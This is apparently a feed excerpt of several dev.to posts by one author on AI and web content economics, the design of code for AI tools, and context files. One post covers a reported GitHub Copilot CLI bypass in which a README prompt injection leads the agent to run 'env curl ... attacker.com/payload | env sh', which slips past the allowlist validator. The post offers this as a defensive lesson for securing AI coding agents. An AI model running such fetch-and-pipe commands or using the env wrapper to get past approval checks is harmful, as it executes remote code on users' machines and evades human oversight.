&lt;p&gt;Reddit figured this out first. They signed a &lt;a href="https://www.theverge.com/2024/2/22/24080165/google-reddit-ai-training-data" rel="noopener noreferrer"&gt;$60M/year deal with Google for AI data access&lt;/a&gt;. AP and Axel Springer did similar deals. The message: "You want our content for your AI? Here's our price."&lt;/p&gt;

&lt;p&gt;For the first time in 20 years, content creators might have actual pricing power. Search engines crawled the web for free, but at least they sent traffic back — a fair trade. With LLMs, there's no equivalent traffic flowing back — which means no reason to give content away for free. The real &lt;code&gt;llms.txt&lt;/code&gt; isn't a free feed. It's a &lt;em&gt;commercial interface&lt;/em&gt;. Think &lt;code&gt;llms.txt&lt;/code&gt; + &lt;code&gt;pricing.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. "LLM SEO" becomes a real industry.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Just like SEO, there will be an entire ecosystem around "how to get your site cited by LLMs." Prompt optimization, citation ranking, structured data strategies — people will figure out how to game LLM citations the same way they gamed Google rankings. Whether that's good or bad is debatable, but it's coming.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. The value shifts to what LLMs can't replicate.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Transaction layers (LLMs can recommend a laptop, they can't sell you one). Interactive tools (calculators, configurators, dashboards — anything that computes based on user input). Community (the experience of being in a discussion, not reading a summary of one). Paywalled depth (free summaries, paid substance).&lt;/p&gt;

&lt;p&gt;These aren't just survival strategies. They're where the &lt;em&gt;premium&lt;/em&gt; value concentrates. Everything LLMs can easily scrape becomes commodity. Everything they can't becomes more valuable by contrast.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Open Questions About AI Search and Content
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;How do small creators survive the transition?&lt;/strong&gt; Reddit can negotiate a $60M deal. A solo blogger can't. If the future is "sell your data to AI companies," that future works for publishers with leverage and leaves everyone else as unpaid training data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How long does this transition take?&lt;/strong&gt; The music industry went through a similar thing with piracy and it took a decade to land on streaming. Content might take just as long. The dual-version web might be inevitable, but "inevitable in 2 years" and "inevitable in 10 years" are very different for someone trying to pay rent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Will a new metric replace pageviews?&lt;/strong&gt; Pageviews made sense when value = eyeballs on your page. What's the equivalent when your content is consumed inside someone else's product? "LLM impressions"? "Citation reach"? Someone will invent this metric, and it'll reshape how we think about content value. I just don't know what it looks like yet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does &lt;code&gt;llms.txt&lt;/code&gt; become standard or get rejected?&lt;/strong&gt; It could go either way. If enough publishers organize and demand payment for LLM access (like the music industry eventually did), we might see a licensing-first model. If publishers fragment and compete for "LLM visibility," it's a race to the bottom — give away more, structure better, hope for citations.&lt;/p&gt;




&lt;p&gt;The dual-version web is probably coming. The question isn't &lt;em&gt;if&lt;/em&gt; — it's whether content creators will have a seat at the table when the economics get sorted out, or whether we'll end up as invisible infrastructure — essential to the ecosystem, but capturing a fraction of the value we create.&lt;/p&gt;

&lt;p&gt;I'm genuinely not sure how this plays out. If you're running a content site, a blog, a documentation hub — what's your move? Are you optimizing for LLMs already? Blocking them? Waiting for someone else to figure out the business model first?&lt;/p&gt;

&lt;p&gt;And if anyone's actually measured the before-and-after of making their site more LLM-accessible — traffic, citations, revenue impact — I'd really love to see the data. Because right now, most of this conversation is theory. And theory is how you end up giving away value before you realize what it's worth.&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>business</category>
      <category>discuss</category>
    </item>
    <item>
      <title>GitHub Copilot Security Review: It Executes Malware With Zero Approval</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Sat, 28 Feb 2026 09:43:04 +0000</pubDate>
      <link>https://dev.to/matthewhou/github-copilot-cli-executes-malware-with-zero-approval-your-cicd-pipeline-would-have-caught-it-4g19</link>
      <guid>https://dev.to/matthewhou/github-copilot-cli-executes-malware-with-zero-approval-your-cicd-pipeline-would-have-caught-it-4g19</guid>
      <description>&lt;p&gt;Two days after GitHub Copilot CLI hit general availability, researchers at PromptArmor published a bypass: a crafted &lt;code&gt;env curl&lt;/code&gt; command slips past the validator, downloads a payload from an attacker URL, and pipes it to &lt;code&gt;sh&lt;/code&gt;. No confirmation dialog. No approval. The "human-in-the-loop" safety net? Entirely circumvented.&lt;/p&gt;

&lt;p&gt;GitHub's response: "a known issue that does not present a significant security risk."&lt;/p&gt;

&lt;p&gt;Let that sink in for a moment.&lt;/p&gt;

&lt;h2&gt;
  
  
  The GitHub Copilot Security Vulnerability Explained
&lt;/h2&gt;

&lt;p&gt;Copilot CLI has a read-only command allowlist — commands like &lt;code&gt;env&lt;/code&gt; that auto-execute without user approval. The trick:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;env &lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="s2"&gt;"https://attacker.com/payload"&lt;/span&gt; | &lt;span class="nb"&gt;env &lt;/span&gt;sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;sh&lt;/code&gt; are arguments to &lt;code&gt;env&lt;/code&gt; (which is allowlisted), the validator doesn't flag them. The external URL check — which depends on detecting &lt;code&gt;curl&lt;/code&gt; or &lt;code&gt;wget&lt;/code&gt; — never fires. The payload downloads and executes silently.&lt;/p&gt;

&lt;p&gt;This isn't a theoretical attack. It works against any cloned repo with a poisoned README. The prompt injection lives in the markdown. You ask Copilot a question about the codebase, it reads the README, and the injected instruction triggers the malicious command.&lt;/p&gt;

&lt;h2&gt;
  
  
  GitHub Copilot Security Issues: A Pattern of Failures
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;What Happened&lt;/th&gt;
&lt;th&gt;Root Cause&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Copilot CLI malware (Feb 2026)&lt;/td&gt;
&lt;td&gt;Bypassed HITL via &lt;code&gt;env&lt;/code&gt; allowlist&lt;/td&gt;
&lt;td&gt;Regex-based validator, no sandboxing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Replit Agent truncated prod DB&lt;/td&gt;
&lt;td&gt;Agent ran &lt;code&gt;TRUNCATE&lt;/code&gt; on live data&lt;/td&gt;
&lt;td&gt;No execution constraints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI code reviewer 5-10% signal&lt;/td&gt;
&lt;td&gt;Teams disabled AI reviewer&lt;/td&gt;
&lt;td&gt;No quality gate on reviewer output&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;67% devs debug AI code more&lt;/td&gt;
&lt;td&gt;Harness 2025 survey&lt;/td&gt;
&lt;td&gt;No automated verification layer&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The pattern is the same every time: &lt;strong&gt;we trusted a text-based safety check instead of building a real verification layer.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why GitHub Copilot Security Reviews Don't Work
&lt;/h2&gt;

&lt;p&gt;The Copilot CLI exploit exposes a fundamental design flaw in how we think about AI coding safety. The assumption is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"If we show the user a confirmation dialog, they'll catch dangerous commands."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Three problems with this:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Validators are bypassable.&lt;/strong&gt; The &lt;code&gt;env&lt;/code&gt; trick took researchers hours to find. There will be more. Regex-based command detection is fundamentally fragile — there are infinite ways to express a shell command.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Humans habituate.&lt;/strong&gt; After approving 50 legitimate commands, you stop reading them. This is the "alarm fatigue" problem that healthcare solved decades ago. We're re-learning it in AI.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. The attack surface is the context window.&lt;/strong&gt; The malicious instruction wasn't typed by the user. It was in a README file. Any data the AI reads — web search results, MCP tool responses, file contents — can carry an injection. You can't HITL-review every input the AI consumes.&lt;/p&gt;

&lt;h2&gt;
  
  
  GitHub Copilot Security Best Practices: The CI/CD Safety Net
&lt;/h2&gt;

&lt;p&gt;Here's the uncomfortable truth: the fix isn't a better validator. It's treating AI-generated commands the same way we treat AI-generated code — &lt;strong&gt;run them through a pipeline before they touch production.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Hallucination in agentic mode isn't a problem — the build/run loop catches it." — tptacek, security researcher&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For AI coding agents, this means:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sandboxed execution.&lt;/strong&gt; Every command the AI wants to run should execute in a disposable container first. If &lt;code&gt;env curl attacker.com | env sh&lt;/code&gt; runs in a sandbox, it downloads the payload into a container that gets destroyed. Your machine stays clean.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network egress policies.&lt;/strong&gt; Instead of regex-matching &lt;code&gt;curl&lt;/code&gt; in command strings, block outbound network at the container level. Allowlist specific domains. This catches &lt;code&gt;env curl&lt;/code&gt;, &lt;code&gt;python -c "import urllib"&lt;/code&gt;, and every other creative bypass.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command audit trails.&lt;/strong&gt; Log every command the AI executes, with full context (what triggered it, what files were read, what the output was). When something goes wrong — and it will — you need forensics, not "we think it might have run something."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Automated rollback.&lt;/strong&gt; Git as "game save points" (as Addy Osmani puts it). Before any AI agent session, snapshot the state. If the session produces suspicious output, &lt;code&gt;git reset --hard&lt;/code&gt; and investigate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bigger Picture: AI Code Security in 2026
&lt;/h2&gt;

&lt;p&gt;The METR study showed developers think AI makes them 24% faster but actually get 19% slower. The Copilot CLI exploit shows the same pattern in security: we &lt;em&gt;feel&lt;/em&gt; safe because there's a confirmation dialog, but the actual safety is an illusion.&lt;/p&gt;

&lt;p&gt;StrongDM's "Dark Factory" approach points to the answer:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Nobody reviews AI-produced code. All investment goes into tests, tools, simulations."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Replace "code" with "commands" and you have the right architecture for AI CLI tools:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Don't trust the validator&lt;/strong&gt; — sandbox everything&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Don't trust the human&lt;/strong&gt; — they'll click "approve" without reading&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trust the pipeline&lt;/strong&gt; — automated checks that can't be socially engineered&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The investment should shift from "building better approval dialogs" to "building better containment." AI agents will get more capable. The attacks will get more creative. The only thing that scales is infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Secure Your AI Coding Tools Setup
&lt;/h2&gt;

&lt;p&gt;If you're using AI coding agents (Copilot, Claude Code, Cursor, anything):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Run in containers.&lt;/strong&gt; Docker, devcontainers, whatever. Just don't give the AI direct access to your host.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lock down network.&lt;/strong&gt; If the AI doesn't need internet access for a task, cut it off.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version everything.&lt;/strong&gt; Git commit before every AI session. Make rollback trivial.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Watch the inputs,&lt;/strong&gt; not just the outputs. The Copilot exploit came through a README. Your AI reads your files, your terminal output, your web searches. Any of those can carry an injection.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Copilot CLI vulnerability isn't just a bug to patch. It's a preview of what happens when we scale AI agent capabilities without scaling the verification infrastructure around them.&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>codequality</category>
      <category>discuss</category>
    </item>
    <item>
      <title>I Stopped Trying to Make AI Smarter. I Made My Code Dumber.</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Thu, 26 Feb 2026 20:20:58 +0000</pubDate>
      <link>https://dev.to/matthewhou/i-stopped-trying-to-make-ai-smarter-i-made-my-code-dumber-4npa</link>
      <guid>https://dev.to/matthewhou/i-stopped-trying-to-make-ai-smarter-i-made-my-code-dumber-4npa</guid>
      <description>&lt;p&gt;If you write code with AI, you know the drill — better prompts, better models, bigger context windows. That's what everyone's optimizing for. I was too, until I noticed something weird.&lt;/p&gt;

&lt;p&gt;I went the other direction. I made my codebase easier for a &lt;em&gt;dumb&lt;/em&gt; AI to work in. And my results got dramatically better.&lt;/p&gt;

&lt;p&gt;Here's what I mean.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Learned From You
&lt;/h2&gt;

&lt;p&gt;My last post on the METR benchmark blew up in the comments. Several of you pointed out something I'd missed — that the real bottleneck isn't AI capability, it's how we structure the work we hand it. That insight directly shaped what I'm about to share.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 38-out-of-40 Problem With Vibe Coding
&lt;/h2&gt;

&lt;p&gt;A few months ago I used Cursor to refactor a function signature across 40 files. 38 files were perfect. 2 had subtle type narrowing bugs — the function's generic type was correctly narrowed in 38 places but incorrectly narrowed in 2 files that had a more complex type hierarchy.&lt;/p&gt;

&lt;p&gt;Local tests passed for all 40 files. The bugs showed up 3 days later.&lt;/p&gt;

&lt;p&gt;I spent a while blaming Cursor. Then I looked at the 2 files that failed. They were the most coupled files in the codebase. They had implicit dependencies on a type hierarchy that spanned 4 directories. Understanding them required holding the entire module graph in your head.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The AI didn't fail because it was dumb. It failed because those 2 files required &lt;em&gt;global&lt;/em&gt; knowledge to edit correctly, and AI operates on &lt;em&gt;local&lt;/em&gt; context. That's not a bug — it's a structural limitation that won't disappear with better models.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  The Pattern That Makes AI Coding Tools Actually Work
&lt;/h2&gt;

&lt;p&gt;I started noticing something:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Code structure&lt;/th&gt;
&lt;th&gt;AI accuracy&lt;/th&gt;
&lt;th&gt;Failure mode&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Clean module, explicit interface&lt;/td&gt;
&lt;td&gt;~95%&lt;/td&gt;
&lt;td&gt;Rare, caught by tests&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Moderate coupling, some implicit deps&lt;/td&gt;
&lt;td&gt;~80%&lt;/td&gt;
&lt;td&gt;Occasional, usually obvious&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tight coupling, implicit dependencies&lt;/td&gt;
&lt;td&gt;~60%&lt;/td&gt;
&lt;td&gt;Plausible-looking bugs that pass local tests&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;AI performance was almost perfectly correlated with how well-structured my code was.&lt;/p&gt;

&lt;p&gt;A comment on one of my earlier posts completely reframed this for me:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"AI is a direction amplifier — clean code gets cleaner, garbage code gets worse."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;— if that was you, thank you. It changed how I think about architecture.&lt;/p&gt;

&lt;p&gt;The first few thousand lines of a project decide everything that comes after.&lt;/p&gt;

&lt;p&gt;This completely reframed how I think about architecture. I'm no longer designing code for human readability alone. I'm designing it so that an AI with a limited context window can work on any single module without needing to understand the whole system.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Structure Code for AI Coding Tools (Designing for a Dumb AI)
&lt;/h2&gt;

&lt;p&gt;Here's what changed in practice:&lt;/p&gt;

&lt;h3&gt;
  
  
  Explicit interfaces everywhere
&lt;/h3&gt;

&lt;p&gt;If a module depends on behavior from another module, that dependency is declared in a type, not implied by convention. The AI doesn't need to know &lt;em&gt;why&lt;/em&gt; things are connected — it just needs to see the interface contract.&lt;/p&gt;

&lt;h3&gt;
  
  
  Smaller files
&lt;/h3&gt;

&lt;p&gt;I used to have 500-line files with multiple responsibilities. Now I split aggressively. Not because I suddenly care about the single responsibility principle for aesthetic reasons — but because an AI working on a 100-line file with clear boundaries makes fewer errors than an AI working on a 500-line file with tangled concerns.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tests that document behavior, not implementation
&lt;/h3&gt;

&lt;p&gt;My tests used to be tightly coupled to internal structure. Now they test observable behavior through public interfaces. This means the AI can refactor internals freely — as long as the behavioral tests pass, the refactor is correct.&lt;/p&gt;

&lt;p&gt;The AI doesn't need to understand &lt;em&gt;how&lt;/em&gt; the code works, only &lt;em&gt;what&lt;/em&gt; it's supposed to do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuration in one place
&lt;/h3&gt;

&lt;p&gt;I had environment variables scattered across 12 files with 3 different naming conventions. AI would sometimes invent new config keys because it didn't find the existing one. Now there's a single config module that exports everything. The AI always knows where to look.&lt;/p&gt;

&lt;h3&gt;
  
  
  No "clever" code
&lt;/h3&gt;

&lt;p&gt;Metaprogramming, dynamic dispatch based on string matching, monkey-patching — all of these are invisible to an AI reading your code. I replaced clever patterns with boring, explicit ones. More lines of code, but the AI (and honestly, future me) can actually follow the logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Uncomfortable Truth About Vibe Coding
&lt;/h2&gt;

&lt;p&gt;Here's what made this click: &lt;strong&gt;every change I made to help the AI also made the code better for humans.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What I did for AI&lt;/th&gt;
&lt;th&gt;What it actually is&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Explicit interfaces&lt;/td&gt;
&lt;td&gt;Good API design&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Smaller files&lt;/td&gt;
&lt;td&gt;Separation of concerns&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Behavior-based tests&lt;/td&gt;
&lt;td&gt;What TDD always recommended&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Single config module&lt;/td&gt;
&lt;td&gt;Single source of truth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No clever code&lt;/td&gt;
&lt;td&gt;Maintainability&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The AI didn't teach me anything new. It just brutally exposed the places where I was cutting corners. The AI can't work around implicit assumptions the way a human teammate can. It takes your code at face value. If the structure is sloppy, the AI's output will be sloppy — but &lt;em&gt;confidently&lt;/em&gt; sloppy, which is worse.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Chris Lattner, reviewing Claude's attempt to build a C compiler: &lt;em&gt;"AI tends to optimize for passing tests rather than building general abstractions."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's exactly right. The AI will make your specific test pass with a specific hack. It won't step back and think about whether the abstraction is right. That's your job — and the best way to do that job is to make the architecture so clear that even a "dumb" AI can't go wrong within any single module.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Trade-off Between Vibe Coding and Code Quality
&lt;/h2&gt;

&lt;p&gt;This approach has a real cost: &lt;strong&gt;it takes more upfront effort.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Splitting files, writing explicit interfaces, refactoring tests from implementation-coupled to behavior-coupled — these aren't free. On a new project, you're building more scaffolding before you start producing features.&lt;/p&gt;

&lt;p&gt;I don't have a clean answer for when this pays off. For a weekend hack or a prototype, it probably doesn't. For anything you'll maintain for more than a month — especially with AI tools — I'm increasingly convinced it pays for itself within the first week.&lt;/p&gt;

&lt;p&gt;But I want to be honest: I'm still figuring out where the line is. Sometimes I over-split and end up with too many files that are individually trivial. Sometimes the "explicit interface" adds boilerplate that makes the code harder to scan. I haven't found the perfect balance yet.&lt;/p&gt;

&lt;p&gt;We're all figuring this out in real-time. Nobody has a playbook for "how to architect code when your co-author is a probabilistic model." If you've found patterns that work, I want to hear them — your comments on my last few posts have already changed my approach more than any blog post I've read.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I'm Not Saying
&lt;/h2&gt;

&lt;p&gt;I'm not saying models don't matter. They do. GPT-4 is better than GPT-3.5 at the same task in the same codebase.&lt;/p&gt;

&lt;p&gt;What I &lt;em&gt;am&lt;/em&gt; saying is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The ceiling on model improvements is lower than people think, and the ceiling on structural improvements is higher than people think.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Upgrading from Sonnet to Opus gives you maybe a 10-20% improvement on hard tasks. Refactoring a tangled module into clean components with explicit interfaces can take AI accuracy from 60% to 95% on that module — regardless of which model you use.&lt;/p&gt;

&lt;p&gt;The highest-leverage thing you can do for AI coding isn't choosing the right model or writing the right prompt. It's making your code so clear that even a mediocre model can't screw it up.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Question I Keep Coming Back To
&lt;/h2&gt;

&lt;p&gt;If AI works best on clean, explicit, well-structured code — and clean, explicit, well-structured code is also what humans work best on — then maybe "designing for AI" and "designing well" are converging.&lt;/p&gt;

&lt;p&gt;And if that's true, then the developers who'll get the most from AI aren't the ones who master prompt engineering. They're the ones who already write clean code — or who start now.&lt;/p&gt;

&lt;p&gt;I genuinely don't take your attention for granted — you just spent 8 minutes thinking about code architecture with me instead of doom-scrolling Twitter. So here's my real question: have you noticed this pattern in your own codebase? That cleaning up one tangled module suddenly made AI dramatically better at working with it? I'm collecting these stories because I think there's something bigger here that none of us have fully articulated yet.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;P.S. — I built &lt;a href="https://updatewave.gumroad.com/l/qqeonx" rel="noopener noreferrer"&gt;3 skill files&lt;/a&gt; that automate the verification side of this — spec before code, checkpoint before changes, structured review after. They won't fix your architecture, but they catch the problems that slip through even in clean codebases.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>codequality</category>
      <category>discuss</category>
    </item>
    <item>
      <title>I Gave AI the Same Task Twice. The Only Difference Was 30 Lines of Markdown.</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Tue, 24 Feb 2026 10:08:03 +0000</pubDate>
      <link>https://dev.to/matthewhou/80-of-ai-is-stupid-complaints-are-actually-context-problems-12ep</link>
      <guid>https://dev.to/matthewhou/80-of-ai-is-stupid-complaints-are-actually-context-problems-12ep</guid>
      <description>&lt;p&gt;I watched a teammate spend 20 minutes complaining that Copilot "doesn't understand our codebase." Then I looked at the repo. No README. No architecture docs. No module descriptions. Just code.&lt;/p&gt;

&lt;p&gt;If that sounds familiar, keep reading. Because the fix took me an hour, and it changed everything about how AI performs on my projects.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Most AI code quality problems aren't AI problems. They're context problems.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I learned from your comments
&lt;/h2&gt;

&lt;p&gt;After my METR study post got 35 comments, something @hilton_fernandes pointed out stuck with me: AI is actually useful for developing in codebases you're &lt;em&gt;not&lt;/em&gt; acquainted with — because it learns from existing code patterns. The flip side? If there are no documented patterns, AI has nothing to learn from.&lt;/p&gt;

&lt;p&gt;&lt;a class="mentioned-user" href="https://dev.to/waqasra2022skipq"&gt;@waqasra2022skipq&lt;/a&gt; made a similar point from the debugging angle: lacking a mental model of your project slows down everything — and AI will keep adding more files and functions without ever building that model for you.&lt;/p&gt;

&lt;p&gt;Those two observations are why context files matter more than model upgrades.&lt;/p&gt;

&lt;h2&gt;
  
  
  The experiment
&lt;/h2&gt;

&lt;p&gt;Same task: "add pagination to the users endpoint." Two attempts, same model, same codebase.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Round 1: No context&lt;/th&gt;
&lt;th&gt;Round 2: With AGENTS.md&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ORM pattern&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Wrong (raw SQL)&lt;/td&gt;
&lt;td&gt;✅ Matched team's Knex style&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error handling&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Generic try/catch&lt;/td&gt;
&lt;td&gt;✅ Used our AppError class&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pagination&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Offset-based&lt;/td&gt;
&lt;td&gt;✅ Cursor-based (our standard)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tests&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ None generated&lt;/td&gt;
&lt;td&gt;✅ Co-located, used test factories&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Usable without edits?&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No — needed full rewrite&lt;/td&gt;
&lt;td&gt;~90% ready&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The AI didn't get smarter between attempts. &lt;strong&gt;The context did.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The uncomfortable math
&lt;/h2&gt;

&lt;p&gt;Everyone's waiting for GPT-6 or Claude Next to "finally get it right." But here's what I keep seeing:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;A mediocre model with good context outperforms a frontier model with zero context.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Think about it like onboarding. You wouldn't drop a senior engineer into your codebase with no docs and expect them to match your team's patterns on day one. Why do we expect that from AI?&lt;/p&gt;

&lt;h2&gt;
  
  
